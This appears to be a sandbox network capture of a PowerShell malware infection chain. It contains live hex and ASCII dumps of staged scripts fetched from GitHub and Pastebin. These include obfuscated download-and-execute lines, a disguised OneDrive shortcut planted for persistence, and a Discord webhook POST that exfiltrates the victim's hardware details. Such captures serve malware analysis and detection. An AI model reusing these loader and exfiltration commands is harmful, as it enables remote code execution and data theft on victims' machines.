                                                                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                        Host: raw.githubusercontent.com
                                                                                        Connection: Keep-Alive
                                                                                        Oct 15, 2024 15:54:39.866935015 CEST541INHTTP/1.1 301 Moved Permanently
                                                                                        Connection: close
                                                                                        Content-Length: 0
                                                                                        Server: Varnish
                                                                                        Retry-After: 0
                                                                                        Location: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                        Accept-Ranges: bytes
                                                                                        Date: Tue, 15 Oct 2024 13:54:39 GMT
                                                                                        Via: 1.1 varnish
                                                                                        X-Served-By: cache-dfw-kdfw8210164-DFW
                                                                                        X-Cache: HIT
                                                                                        X-Cache-Hits: 0
                                                                                        X-Timer: S1729000480.801547,VS0,VE0
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                                        Expires: Tue, 15 Oct 2024 13:59:39 GMT
                                                                                        Vary: Authorization,Accept-Encoding


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        0192.168.2.1249712185.199.109.1334437056C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-15 13:54:10 UTC242OUTGET /Neth3N/na9ow3495raygwi4gyrhuawerawera/refs/heads/main/cr_asm_crypter.txt HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                        Host: raw.githubusercontent.com
                                                                                        Connection: Keep-Alive
                                                                                        2024-10-15 13:54:10 UTC901INHTTP/1.1 200 OK
                                                                                        Connection: close
                                                                                        Content-Length: 7088
                                                                                        Cache-Control: max-age=300
                                                                                        Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                        ETag: "6e4c41fcadb09e4c44f95bcd21966ae888aebf2d5f8b0bcd34ef015521114ea0"
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        X-Content-Type-Options: nosniff
                                                                                        X-Frame-Options: deny
                                                                                        X-XSS-Protection: 1; mode=block
                                                                                        X-GitHub-Request-Id: 5B18:1AF8D8:AD9A7D:BD5271:670E73FF
                                                                                        Accept-Ranges: bytes
                                                                                        Date: Tue, 15 Oct 2024 13:54:10 GMT
                                                                                        Via: 1.1 varnish
                                                                                        X-Served-By: cache-dfw-kdfw8210047-DFW
                                                                                        X-Cache: MISS
                                                                                        X-Cache-Hits: 0
                                                                                        X-Timer: S1729000451.638466,VS0,VE106
                                                                                        Vary: Authorization,Accept-Encoding,Origin
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                                        X-Fastly-Request-ID: 13a79995234a8a5bb11cdccc22c54a1db28f4287
                                                                                        Expires: Tue, 15 Oct 2024 13:59:10 GMT
                                                                                        Source-Age: 0
                                                                                        2024-10-15 13:54:10 UTC1378INData Raw: 73 6c 65 65 70 20 35 0a 0a 23 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 20 3d 20 22 24 65 6e 76 3a 74 6d 70 5c 44 72 69 76 65 72 44 69 61 67 2e 64 6c 6c 22 0a 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 20 3d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 5c 46 69 6c 65 53 79 6e 63 5c 42 65 67 69 6e 53 79 6e 63 2e 6c 6e 6b 22 0a 69 66 20 28 2d 4e 6f 74 20 28 54 65 73 74 2d 50 61 74 68 20 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 29 29 20 7b 0a 0a 24 63 75 72 72 65 6e 74 50 61 74 68 20 3d 20 5b 53 79 73 74 65 6d 2e 45 6e 76 69 72 6f 6e 6d 65 6e 74 5d 3a 3a 47 65 74 45 6e 76 69 72 6f 6e 6d 65 6e 74 56 61 72 69 61 62 6c 65 28 22 50 41 54 48 22 2c 20 22 55 73 65 72 22 29 0a 24 6e 65 77 50 61 74 68 20 3d 20 24 63
                                                                                        Data Ascii: sleep 5#$googoogaagaa = "$env:tmp\DriverDiag.dll"$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"if (-Not (Test-Path $googoogaagaa)) {$currentPath = [System.Environment]::GetEnvironmentVariable("PATH", "User")$newPath = $c
                                                                                        2024-10-15 13:54:10 UTC1378INData Raw: 30 2c 34 2c 30 2c 32 33 39 2c 31 39 30 2c 31 36 37 2c 38 34 2c 34 34 2c 34 32 2c 34 31 2c 38 39 2c 38 2c 31 38 36 2c 34 36 2c 30 2c 30 2c 30 2c 32 34 36 2c 32 35 2c 30 2c 30 2c 30 2c 30 2c 32 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 32 2c 31 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 34 36 2c 32 33 38 2c 32 38 2c 31 2c 38 37 2c 30 2c 31 30 35 2c 30 2c 31 31 30 2c 30 2c 31 30 30 2c 30 2c 31 31 31 2c 30 2c 31 31 39 2c 30 2c 31 31 35 2c 30 2c 30 2c 30 2c 32 32 2c 30 2c 39 30 2c 30 2c 34 39 2c 30 2c 30 2c 30 2c 30 2c 30 2c 33 36 2c 38 39 2c 31 30 34 2c 31 38 33 2c 31 36 2c 30 2c 38 33 2c 31 32 31 2c 31 31 35 2c 31 31 36 2c 31 30 31 2c 31 30 39 2c 35 31 2c 35 30 2c 30 2c 30 2c 36 36 2c 30 2c 39 2c 30 2c 34 2c 30 2c 32 33 39 2c 31 39 30 2c 31 36 37 2c 38 34
                                                                                        Data Ascii: 0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,246,25,0,0,0,0,2,0,0,0,0,0,12,1,0,0,0,0,0,0,0,0,46,238,28,1,87,0,105,0,110,0,100,0,111,0,119,0,115,0,0,0,22,0,90,0,49,0,0,0,0,0,36,89,104,183,16,0,83,121,115,116,101,109,51,50,0,0,66,0,9,0,4,0,239,190,167,84
                                                                                        2024-10-15 13:54:10 UTC1378INData Raw: 34 37 2c 30 2c 39 39 2c 30 2c 33 32 2c 30 2c 33 34 2c 30 2c 31 31 32 2c 30 2c 31 31 31 2c 30 2c 31 31 39 2c 30 2c 31 30 31 2c 30 2c 31 31 34 2c 30 2c 31 31 35 2c 30 2c 31 30 34 2c 30 2c 31 30 31 2c 30 2c 31 30 38 2c 30 2c 31 30 38 2c 30 2c 34 36 2c 30 2c 31 30 31 2c 30 2c 31 32 30 2c 30 2c 31 30 31 2c 30 2c 33 32 2c 30 2c 34 35 2c 30 2c 39 39 2c 30 2c 31 31 31 2c 30 2c 31 30 39 2c 30 2c 31 30 39 2c 30 2c 39 37 2c 30 2c 31 31 30 2c 30 2c 31 30 30 2c 30 2c 33 32 2c 30 2c 31 31 32 2c 30 2c 31 31 31 2c 30 2c 31 31 39 2c 30 2c 31 30 31 2c 30 2c 31 31 34 2c 30 2c 31 31 35 2c 30 2c 31 30 34 2c 30 2c 31 30 31 2c 30 2c 31 30 38 2c 30 2c 31 30 38 2c 30 2c 33 32 2c 30 2c 34 35 2c 30 2c 31 31 39 2c 30 2c 31 30 35 2c 30 2c 31 31 30 2c 30 2c 31 30 30 2c 30 2c 31 31 31
                                                                                        Data Ascii: 47,0,99,0,32,0,34,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,46,0,101,0,120,0,101,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,32,0,45,0,119,0,105,0,110,0,100,0,111
                                                                                        2024-10-15 13:54:10 UTC1378INData Raw: 31 30 2c 32 33 39 2c 31 37 2c 31 35 30 2c 31 39 34 2c 32 31 32 2c 32 31 36 2c 38 33 2c 31 33 33 2c 32 34 2c 31 37 2c 37 33 2c 32 2c 30 2c 30 2c 39 2c 30 2c 30 2c 31 36 30 2c 38 39 2c 30 2c 30 2c 30 2c 34 39 2c 38 33 2c 38 30 2c 38 33 2c 32 33 37 2c 34 38 2c 31 38 39 2c 32 31 38 2c 36 37 2c 30 2c 31 33 37 2c 37 31 2c 31 36 37 2c 32 34 38 2c 32 30 38 2c 31 39 2c 31 36 34 2c 31 31 35 2c 31 30 32 2c 33 34 2c 36 31 2c 30 2c 30 2c 30 2c 31 30 30 2c 30 2c 30 2c 30 2c 30 2c 33 31 2c 30 2c 30 2c 30 2c 32 32 2c 30 2c 30 2c 30 2c 38 33 2c 30 2c 31 32 31 2c 30 2c 31 31 35 2c 30 2c 31 31 36 2c 30 2c 31 30 31 2c 30 2c 31 30 39 2c 30 2c 35 31 2c 30 2c 35 30 2c 30 2c 33 32 2c 30 2c 34 30 2c 30 2c 36 37 2c 30 2c 35 38 2c 30 2c 39 32 2c 30 2c 38 37 2c 30 2c 31 30 35 2c 30
                                                                                        Data Ascii: 10,239,17,150,194,212,216,83,133,24,17,73,2,0,0,9,0,0,160,89,0,0,0,49,83,80,83,237,48,189,218,67,0,137,71,167,248,208,19,164,115,102,34,61,0,0,0,100,0,0,0,0,31,0,0,0,22,0,0,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,32,0,40,0,67,0,58,0,92,0,87,0,105,0
                                                                                        2024-10-15 13:54:10 UTC1378INData Raw: 31 30 38 2c 30 2c 31 30 31 2c 30 2c 31 31 35 2c 30 2c 34 36 2c 30 2c 31 30 31 2c 30 2c 31 32 30 2c 30 2c 31 30 31 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 35 37 2c 30 2c 30 2c 30 2c 34 39 2c 38 33 2c 38 30 2c 38 33 2c 31 37 37 2c 32 32 2c 31 30 39 2c 36 38 2c 31 37 33 2c 31 34 31 2c 31 31 32 2c 37 32 2c 31 36 37 2c 37 32 2c 36 34 2c 34 36 2c 31 36 34 2c 36 31 2c 31 32 30 2c 31 34 30 2c 32 39 2c 30 2c 30 2c 30 2c 31 30 34 2c 30 2c 30 2c 30 2c 30 2c 37 32 2c 30 2c 30 2c 30 2c 31 32 37 2c 31 30 35 2c 31 39 34 2c 32 32 34 2c 32 31 37 2c 38 38 2c 32 34 38 2c 37 35 2c 31 33 38 2c 32 35 32 2c 32 36 2c 36 30 2c 36 36 2c 34 39 2c 34 2c 37 32 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 29 0a 24 72 65 63 6f 6e 73 74 72 75
                                                                                        Data Ascii: 108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,0,0,0,0,0,0,57,0,0,0,49,83,80,83,177,22,109,68,173,141,112,72,167,72,64,46,164,61,120,140,29,0,0,0,104,0,0,0,0,72,0,0,0,127,105,194,224,217,88,248,75,138,252,26,60,66,49,4,72,0,0,0,0,0,0,0,0,0,0,0,0)$reconstru
                                                                                        2024-10-15 13:54:10 UTC198INData Raw: 74 70 75 74 20 22 46 61 69 6c 65 64 20 74 6f 20 73 65 6e 64 20 6d 65 73 73 61 67 65 2e 20 45 72 72 6f 72 3a 20 24 5f 22 0a 7d 0a 23 73 74 61 72 74 20 70 6f 77 65 72 73 68 65 6c 6c 20 2d 77 69 6e 64 6f 77 73 74 79 6c 65 20 68 20 2d 61 72 67 73 20 27 69 65 78 20 28 69 77 72 20 72 61 77 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 4e 65 74 68 33 4e 2f 6e 61 39 6f 77 33 34 39 35 72 61 79 67 77 69 34 67 79 72 68 75 61 77 65 72 61 77 65 72 61 2f 6d 61 69 6e 2f 67 61 62 65 72 5f 70 79 6c 64 2e 74 78 74 20 2d 75 73 65 62 61 73 69 63 70 61 72 73 69 6e 67 29 27 0a 0a 7d 0a
                                                                                        Data Ascii: tput "Failed to send message. Error: $_"}#start powershell -windowstyle h -args 'iex (iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber_pyld.txt -usebasicparsing)'}


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1192.168.2.1255611162.159.138.2324437056C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-15 13:54:30 UTC311OUTPOST /api/webhooks/1295171900019966004/KRGDAVzqdqMZILdh_WVWyqLwT2_aVjXOXnoEnaoZ5xZY_kNOmMNm2yrdQTKMOzXSXWSI HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                        Content-Type: application/json
                                                                                        Host: discord.com
                                                                                        Content-Length: 217
                                                                                        Connection: Keep-Alive
                                                                                        2024-10-15 13:54:30 UTC217OUTData Raw: 7b 0d 0a 20 20 20 20 22 63 6f 6e 74 65 6e 74 22 3a 20 20 22 2a 2a 61 6c 62 75 73 2a 2a 20 68 61 73 20 6a 6f 69 6e 65 64 20 2d 20 63 72 7a 63 72 70 74 5c 6e 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 5c 6e 2a 2a 47 50 55 3a 2a 2a 20 59 38 57 4d 31 39 36 4d 5c 6e 2a 2a 43 50 55 3a 2a 2a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 5c 6e 2a 2a 43 50 55 20 43 6f 72 65 73 3a 2a 2a 20 34 20 34 22 0d 0a 7d
                                                                                        Data Ascii: { "content": "**user** has joined - crzcrpt\n----------------------------------\n**GPU:** Y8WM196M\n**CPU:** Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\n**CPU Cores:** 4 4"}
                                                                                        2024-10-15 13:54:30 UTC1255INHTTP/1.1 404 Not Found
                                                                                        Date: Tue, 15 Oct 2024 13:54:30 GMT
                                                                                        Content-Type: application/json
                                                                                        Content-Length: 45
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=3600, s-maxage=3600
                                                                                        strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                        x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                        x-ratelimit-limit: 5
                                                                                        x-ratelimit-remaining: 4
                                                                                        x-ratelimit-reset: 1729000471
                                                                                        x-ratelimit-reset-after: 1
                                                                                        via: 1.1 google
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        CF-Cache-Status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2Fv34Bm0hZ7hp6mBEyYE%2FiN25d%2BPcp9UNScYkru13Bj7kXmAJuQezDRWwHiwynJLOYJb3LvUa12F0Xpn9FGaOB3oF0dsXL1QktYE2vklRgfn4XFknCGnjyNB9Dc1n"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Set-Cookie: __cfruid=28b32a450ff2bac380e830d167c0604ce7a5a202-1729000470; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                        Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                        Set-Cookie: _cfuvid=lQe0Iw2OKxzgySPaR37b46io8PxLRVd4alq_N7AH9uM-1729000470457-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8d304d2bba08a916-DFW
                                                                                        2024-10-15 13:54:30 UTC45INData Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d
                                                                                        Data Ascii: {"message": "Unknown Webhook", "code": 10015}


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        2192.168.2.1255614104.20.4.2354436988C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-15 13:54:31 UTC169OUTGET /raw/sA04Mwk2 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                        Host: pastebin.com
                                                                                        Connection: Keep-Alive
                                                                                        2024-10-15 13:54:31 UTC397INHTTP/1.1 200 OK
                                                                                        Date: Tue, 15 Oct 2024 13:54:31 GMT
                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        x-frame-options: DENY
                                                                                        x-content-type-options: nosniff
                                                                                        x-xss-protection: 1;mode=block
                                                                                        cache-control: public, max-age=1801
                                                                                        CF-Cache-Status: HIT
                                                                                        Age: 121
                                                                                        Last-Modified: Tue, 15 Oct 2024 13:52:30 GMT
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8d304d332937315f-DFW
                                                                                        2024-10-15 13:54:31 UTC139INData Raw: 38 35 0d 0a 63 61 6c 6c 69 54 28 57 49 4e 44 4f 57 53 5f 4e 54 20 28 22 72 61 77 2e 67 69 22 2b 22 74 68 75 62 22 2b 22 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 22 2b 22 6f 6d 2f 4e 65 22 2b 22 74 68 33 4e 2f 6e 61 39 6f 77 33 34 39 35 72 61 79 67 77 69 34 22 2b 22 67 79 72 68 75 61 77 65 72 61 77 65 72 61 2f 6d 61 69 6e 2f 67 61 62 65 72 2e 74 78 74 22 29 20 2d 75 73 65 62 61 73 69 63 70 61 72 73 69 6e 67 29 0d 0a
                                                                                        Data Ascii: 85calliT(WINDOWS_NT ("raw.gi"+"thub"+"usercontent.c"+"om/Ne"+"th3N/na9ow3495raygwi4"+"gyrhuawerawera/main/gaber.txt") -usebasicparsing)
                                                                                        2024-10-15 13:54:31 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        3192.168.2.1255617185.199.109.1334436988C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-15 13:54:32 UTC222OUTGET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                        Host: raw.githubusercontent.com
                                                                                        Connection: Keep-Alive
                                                                                        2024-10-15 13:54:33 UTC902INHTTP/1.1 200 OK
                                                                                        Connection: close
                                                                                        Content-Length: 7508
                                                                                        Cache-Control: max-age=300
                                                                                        Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                        ETag: "085e232a893b000bbbc5e224886d89e33401e064c6e72827d0c19fb0195af2ea"
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        X-Content-Type-Options: nosniff
                                                                                        X-Frame-Options: deny
                                                                                        X-XSS-Protection: 1; mode=block
                                                                                        X-GitHub-Request-Id: B26C:32E28B:21F9020:25C3557:670E73A0
                                                                                        Accept-Ranges: bytes
                                                                                        Date: Tue, 15 Oct 2024 13:54:33 GMT
                                                                                        Via: 1.1 varnish
                                                                                        X-Served-By: cache-dfw-kdal2120028-DFW
                                                                                        X-Cache: HIT
                                                                                        X-Cache-Hits: 1
                                                                                        X-Timer: S1729000473.010229,VS0,VE1
                                                                                        Vary: Authorization,Accept-Encoding,Origin
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                                        X-Fastly-Request-ID: 700cbc9ef1697c4bb09e678b2830abba1cba0869
                                                                                        Expires: Tue, 15 Oct 2024 13:59:33 GMT
                                                                                        Source-Age: 120
                                                                                        2024-10-15 13:54:33 UTC1378INData Raw: 73 6c 65 65 70 20 35 0a 72 6d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 5c 46 69 6c 65 53 79 6e 63 5c 42 65 67 69 6e 53 79 6e 63 2e 6c 6e 6b 22 20 2d 46 6f 72 63 65 0a 73 6c 65 65 70 20 35 0a 0a 0a 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 20 3d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 5c 46 69 6c 65 53 79 6e 63 5c 42 65 67 69 6e 53 79 6e 63 2e 6c 6e 6b 22 0a 69 66 20 28 2d 4e 6f 74 20 28 54 65 73 74 2d 50 61 74 68 20 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 29 29 20 7b 0a 72 6d 20 24 65 6e 76 3a 74 6d 70 5c 6f 6e 65 64 72 69 76 65 66 69 6c 65 73 79 6e 63 2e 64 6c 6c 20 2d 66 6f 72 63 65 0a 4e 65 77 2d 49 74 65 6d 50 72 6f 70 65 72 74
                                                                                        Data Ascii: sleep 5rm "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk" -Forcesleep 5$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"if (-Not (Test-Path $googoogaagaa)) {rm $env:tmp\onedrivefilesync.dll -forceNew-ItemPropert
                                                                                        2024-10-15 13:54:33 UTC1378INData Raw: 2c 30 2c 30 2c 37 34 2c 30 2c 39 2c 30 2c 34 2c 30 2c 32 33 39 2c 31 39 30 2c 31 36 37 2c 38 34 2c 31 33 30 2c 34 32 2c 34 31 2c 38 39 2c 32 30 38 2c 31 38 39 2c 34 36 2c 30 2c 30 2c 30 2c 36 35 2c 32 34 38 2c 30 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 31 36 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 33 32 2c 31 31 36 2c 32 36 2c 30 2c 31 30 32 2c 30 2c 31 31 31 2c 30 2c 31 31 34 2c 30 2c 31 30 32 2c 30 2c 31 30 35 2c 30 2c 31 30 38 2c 30 2c 31 30 31 2c 30 2c 31 31 35 2c 30 2c 34 36 2c 30 2c 31 30 31 2c 30 2c 31 32 30 2c 30 2c 31 30 31 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 38 36 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 35 32 2c 30 2c 30 2c 30 2c 30 2c
                                                                                        Data Ascii: ,0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,
                                                                                        2024-10-15 13:54:33 UTC1378INData Raw: 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 31 30 38 2c 30 2c 31 30 35 2c 30 2c 31 31 36 2c 30 2c 33 32 2c 30 2c 31 30 35 2c 30 2c 36 39 2c 30 2c 31 32 30 2c 30 2c 35 39 2c 30 2c 33 32 2c 30 2c 31 31 35 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 33 32 2c 30 2c 33 36 2c 30 2c 31 30 31 2c 30 2c 31 31 30 2c 30 2c 31 31 38 2c 30 2c 35 38 2c 30 2c 31 31 31 2c 30 2c 31 31 35 2c 30 2c 33 32 2c 30 2c 31 30 35 2c 30 2c 38 37 2c 30 2c 31 31 34 2c 30 2c 35 39 2c 30 2c 33 32 2c 30 2c 39 39 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 31 30 38 2c 30 2c 31 30 35 2c 30 2c 38 34 2c 30 2c 34 30 2c 30 2c 38 37 2c 30 2c 37 33 2c 30 2c 37 38 2c 30 2c 36 38 2c 30 2c 37 39 2c 30 2c 38 37 2c 30 2c 38 33 2c 30 2c 39 35 2c 30 2c 37 38 2c 30 2c 38 34 2c 30 2c 33 32 2c 30 2c 31 31 32 2c
                                                                                        Data Ascii: ,0,97,0,108,0,108,0,105,0,116,0,32,0,105,0,69,0,120,0,59,0,32,0,115,0,97,0,108,0,32,0,36,0,101,0,110,0,118,0,58,0,111,0,115,0,32,0,105,0,87,0,114,0,59,0,32,0,99,0,97,0,108,0,108,0,105,0,84,0,40,0,87,0,73,0,78,0,68,0,79,0,87,0,83,0,95,0,78,0,84,0,32,0,112,
                                                                                        2024-10-15 13:54:33 UTC1378INData Raw: 31 2c 30 2c 35 31 2c 30 2c 35 30 2c 30 2c 35 31 2c 30 2c 34 38 2c 30 2c 35 30 2c 30 2c 34 39 2c 30 2c 34 35 2c 30 2c 35 37 2c 30 2c 34 39 2c 30 2c 35 33 2c 30 2c 35 32 2c 30 2c 35 31 2c 30 2c 35 36 2c 30 2c 34 38 2c 30 2c 35 34 2c 30 2c 35 37 2c 30 2c 34 35 2c 30 2c 35 31 2c 30 2c 35 30 2c 30 2c 35 30 2c 30 2c 35 30 2c 30 2c 35 31 2c 30 2c 35 34 2c 30 2c 35 31 2c 30 2c 35 37 2c 30 2c 35 32 2c 30 2c 35 32 2c 30 2c 34 35 2c 30 2c 34 39 2c 30 2c 34 38 2c 30 2c 34 38 2c 30 2c 34 39 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 37 37 2c 30 2c 30 2c 30 2c 34 39 2c 38 33 2c 38 30 2c 38 33 2c 34 38 2c 32 34 31 2c 33 37 2c 31 38 33 2c 32 33 39 2c 37 31 2c 32 36 2c 31 36 2c 31 36 35 2c 32 34 31 2c 32 2c 39 36 2c 31 34 30 2c 31 35 38 2c 32 33 35 2c 31 37 32 2c 34
                                                                                        Data Ascii: 1,0,51,0,50,0,51,0,48,0,50,0,49,0,45,0,57,0,49,0,53,0,52,0,51,0,56,0,48,0,54,0,57,0,45,0,51,0,50,0,50,0,50,0,51,0,54,0,51,0,57,0,52,0,52,0,45,0,49,0,48,0,48,0,49,0,0,0,0,0,0,0,177,0,0,0,49,83,80,83,48,241,37,183,239,71,26,16,165,241,2,96,140,158,235,172,4
                                                                                        2024-10-15 13:54:33 UTC1378INData Raw: 63 70 75 20 3d 20 47 65 74 2d 57 6d 69 4f 62 6a 65 63 74 20 2d 43 6c 61 73 73 20 57 69 6e 33 32 5f 50 72 6f 63 65 73 73 6f 72 20 7c 20 53 65 6c 65 63 74 2d 4f 62 6a 65 63 74 20 2d 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 2c 20 4d 61 6e 75 66 61 63 74 75 72 65 72 2c 20 4e 75 6d 62 65 72 4f 66 43 6f 72 65 73 2c 20 4e 75 6d 62 65 72 4f 66 4c 6f 67 69 63 61 6c 50 72 6f 63 65 73 73 6f 72 73 0a 0a 23 20 52 65 74 72 69 65 76 65 20 47 50 55 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 0a 24 67 70 75 20 3d 20 47 65 74 2d 57 6d 69 4f 62 6a 65 63 74 20 2d 43 6c 61 73 73 20 57 69 6e 33 32 5f 56 69 64 65 6f 43 6f 6e 74 72 6f 6c 6c 65 72 20 7c 20 53 65 6c 65 63 74 2d 4f 62 6a 65 63 74 20 2d 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 2c 20 41 64 61 70 74 65 72 52 41 4d 2c 20 44 72 69
                                                                                        Data Ascii: cpu = Get-WmiObject -Class Win32_Processor | Select-Object -Property Name, Manufacturer, NumberOfCores, NumberOfLogicalProcessors# Retrieve GPU information$gpu = Get-WmiObject -Class Win32_VideoController | Select-Object -Property Name, AdapterRAM, Dri
